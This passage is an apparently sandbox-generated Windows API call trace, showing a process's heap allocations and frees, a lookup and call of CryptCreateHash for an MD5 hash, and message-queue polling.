hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.803] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0087.803] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.804] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e98 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0087.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9d30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.805] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7160 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0087.805] CryptCreateHash (in: hProv=0x9961a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0087.805] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.806] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0087.807] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0087.807] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0087.808] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.809] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0087.809] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.809] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0087.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.810] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.810] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0087.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0087.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71b38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.810] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0087.811] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69940 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0087.811] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0087.811] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 